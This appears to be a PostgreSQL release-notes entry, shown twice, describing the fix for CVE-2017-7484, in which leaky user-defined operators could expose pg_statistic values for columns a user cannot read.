Prevent exposure of statistical information via leaky operators (Peter Eisentraut)
Some selectivity estimation functions in the planner
will apply user-defined operators to values obtained from
pg_statistic, such as
most common values and histogram entries. This occurs
before table permissions are checked, so a nefarious user
could exploit the behavior to obtain these values for
table columns he does not have permission to read. To
fix, fall back to a default estimate if the operator's
implementation function is not certified leak-proof and
the calling user does not have permission to read the
table column whose statistics are needed. At least one of
these criteria is satisfied in most cases in practice.
(CVE-2017-7484)
⇑ Upgrade to 9.2.21 released on 2017-05-11 - docs
Prevent exposure of statistical information via leaky operators (Peter Eisentraut)
Some selectivity estimation functions in the planner
will apply user-defined operators to values obtained from
pg_statistic, such as
most common values and histogram entries. This occurs
before table permissions are checked, so a nefarious user
could exploit the behavior to obtain these values for
table columns he does not have permission to read. To
fix, fall back to a default estimate if the operator's
implementation function is not certified leak-proof and
the calling user does not have permission to read the
table column whose statistics are needed. At least one of
these criteria is satisfied in most cases in practice.
(CVE-2017-7484)